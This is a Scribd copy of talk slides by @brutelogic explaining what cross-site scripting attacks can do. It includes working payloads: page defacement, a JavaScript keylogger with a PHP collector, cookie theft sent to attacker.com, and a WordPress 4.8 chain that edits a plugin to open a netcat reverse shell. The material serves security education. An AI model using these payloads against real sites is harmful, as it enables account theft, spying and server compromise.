Scribd
Upload
137 views43 pages

For The Win!: @brutelogic

This document discusses cross-site scripting (XSS) vulnerabilities and what can be done with them. It begins with an introduction to XSS, describing how JavaScript code can be executed by an attacker in a victim's browser. It then outlines several dangers of XSS, including virtual defacement, leakage and spying of private information, account stealing, using the vulnerability as a memory corruption vector, creating XSS worms, and compromising content management systems. The document provides examples of code to demonstrate keylogging, cookie theft, and using an XSS flaw to achieve remote code execution on a WordPress site. It concludes with some less dangerous outcomes of XSS and notes on how easily XSS payloads can be delivered

Uploaded by

gijay
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
137 views43 pages

For The Win!: @brutelogic

This document discusses cross-site scripting (XSS) vulnerabilities and what can be done with them. It begins with an introduction to XSS, describing how JavaScript code can be executed by an attacker in a victim's browser. It then outlines several dangers of XSS, including virtual defacement, leakage and spying of private information, account stealing, using the vulnerability as a memory corruption vector, creating XSS worms, and compromising content management systems. The document provides examples of code to demonstrate keylogging, cookie theft, and using an XSS flaw to achieve remote code execution on a WordPress site. It concludes with some less dangerous outcomes of XSS and notes on how easily XSS payloads can be delivered

Uploaded by

gijay
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 43

XSS For the win!

What can be really done with Cross-Site Scripting

by @brutelogic
Whoami
● Security Researcher at Sucuri Security
(a GoDaddy company)

● XSS, filter/WAF bypass and… bash!

● Helped to fix more than 1000 XSS


vulnerabilities in www

● Actually developing/maintaining
KNOXSS, an online XSS tool
Agenda
● Fast Intro to XSS

● Dangers of XSS

○ Virtual Defacement

○ LSD - Leakage, Spying and Deceiving

○ Account Stealing

○ Memory Corruption Vector

○ XSS Worm

○ CMS Pwnage

● Miscellaneous
Fast Intro to XSS
Definition

● XSS is javascript code executed by attacker in victim’s browser

● Browsers use a programmatic (object oriented) model of HTML documents called


DOM (Document Object Model) where every markup element is a DOM node.

● Almost anything done in browser is performed only or also by javascript


Fast Intro to XSS
Classical Example

● Vulnerable PHP Source Code

$username = $_GET[“user”];

echo “<h1>Hello, $username!</h1>”;


Fast Intro to XSS
Classical Example

● Reflection of User Controlled Input “John”


Fast Intro to XSS
Classical Example

● Execution of Script Block via User Input


Fast Intro to XSS
Main Types

● Server based: attack comes in server’s response (99,99% in source code), directly
with input (reflected) or indirectly with a previously saved input (stored);

● Client based: rogue input is treated by native javascript code of the page and gets
executed directly or indirectly in the same way as above. Aka DOM-based XSS.
Dangers of XSS
Virtual

Defaceme
nt
Let’s take the blue pill.
Virtual Defacement

● XSS that alters the visual of the page


for the victim, spreading attacker’s
message or fake news

● Might impact business or influence


someone’s decision (like buy/sell of
stocks or btc)
Simple defacement injection

<img src=//attacker.com/picture.jpg style=width:100%;height:100%>


“Loss! Hacker known as ‘Brute Logic’ steals a fortune from Globo’s journalist”
(headline)
Targeted code
<iframe

onload="parent.frames[0].document.getElementsByTagName('h1')
[1].innerHTML='Prejuizo! Hacker conhecido como \'Brute Logic\' rouba verdadeira
fortuna de jornalista global'"

style="border:0;position:absolute;top:0;left:0;right:0;bottom:0;width:100%;height:100%"

src="//www.tribunahoje.com/noticia/148537/entretenimento/2015/07/17/prejuizo-hacker-
rouba-verdadeira-fortuna-de-jornalista-global.html">
LSD
Leakage, Spying and Deceiving

Trust no one.
LSD - Leakage, Spying and Deceiving
● Leakage: any private info accessible by js is
easily exfiltrated

● Spying: what victim type can be logged and


sent anywhere

● Deceiving: by presenting a fake login form,


victim’s credentials are taken
$ cat k.js

XSS Keylogger keys = '';

document.onkeypress = function(e) {

get = window.event?event:e;
$ cat k.php
key = get.keyCode?get.keyCode:get.charCode;
<?php
key = String.fromCharCode(key);

$k = $_GET["k"];
keys += key;

if (!empty(k)) { }

$f = fopen("log.txt", "a+"); setInterval(function(){

fwrite($f, $k); new Image().src = '//localhost/keylogger/k.php?k=' + keys;

fclose($f); keys = '';

} }, 1000);
Keylogging with XSS
Account

Stealing My another account is your account.


Account Stealing

● Session cookies can be exfiltrated


(except httpOnly ones)

● Unprotected password/email/phone
number change functionality can be
abused to compromise account
Short js code to steal cookies:

fetch(‘//attacker.com/?cookie=’+document.cookie)
Unprotected password change in wordpress.com
Memory

Corruptio Vector

n Welcome to my box.
Memory Corruption Vector

● By simply firing a request to a


server with a exploit, an
attacker can compromise the
underlying machine of the
victim.
Metasploit Browser Autopwn 2 loaded
Unleashing the Metasploit beast:
<img src=//attacker.com>
XSS

Worm XSS is my hero.


XSS Worm

● Rogue js code can spread itself


across the database of web app

● Exponential growth in social apps,


possibility of total compromise
XSS Worm

● An worm in action can be


seen here (lab experiment)
CMS
Pwnage

Hey admin, give me admin!


CMS Pwnage

● If an administrator of a CMS install


gets XSSed, RCE is straightforward

● Get the anti-CSRF token then submit


with it to edit or upload code to server
https://w3techs.com/technologies/overview/content_management/all
Wordpress 4.8 - XSS to RCE

● Targeting Hello Dolly plugin, vanilla install

● 200 OK for /wordpress/wp-


content/plugins/hello.php
Wordpress 4.8 - XSS to RCE
● Defining some vars (path, file and payload)

p = '/wordpress/wp-admin/plugin-editor.php?';

q = 'file=hello.php';

s = '<?=`nc attacker.com 5855 -e /bin/bash`;'; // reverse shell to attacker.com:5855


Wordpress 4.8 - XSS to RCE
● Grabbing anti-CSRF token ( _wpnonce) and preparing content update

a = new XMLHttpRequest();

a.open('GET', p+q, 0);

a.send();

$ = '_wpnonce=' + /nonce" value="([^"]*?)"/.exec(a.responseText)[1] + '&newcontent=' +


s + '&action=update&' + q;
Wordpress 4.8 - XSS to RCE
● Submitting plugin edition

b = new XMLHttpRequest();

b.open('POST', p+q, 1);

b.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');

b.send($);
Wordpress 4.8 - XSS to RCE
● Executing payload by firing a request

b.onreadystatechange = function(){

if (this.readyState == 4) {

fetch('/wordpress/wp-content/plugins/hello.php');

}
Opening a netcat shell after triggering a stored XSS in WP
Miscellaneous

● Less Dangerous Outcomes

1. Forced download of files

2. Denial of Service

3. Attacks in mobile or with user


permission (geolocation, audio/video
capture, plugin install, etc)
Miscellaneous

● Easiness of XSS Delivery

1. Easily shared in social networks

2. Disguised by URL shortening services

3. Spam, spear phishing and watering hole


Miscellaneous

● References

http://brutelogic.com.br/blog

http://brutelogic.com.br/cheatsheet

https://youtu.be/i8mTYicEQrI

https://youtu.be/26V01iIjeGk
Thank
You!
#hack2learn

You might also like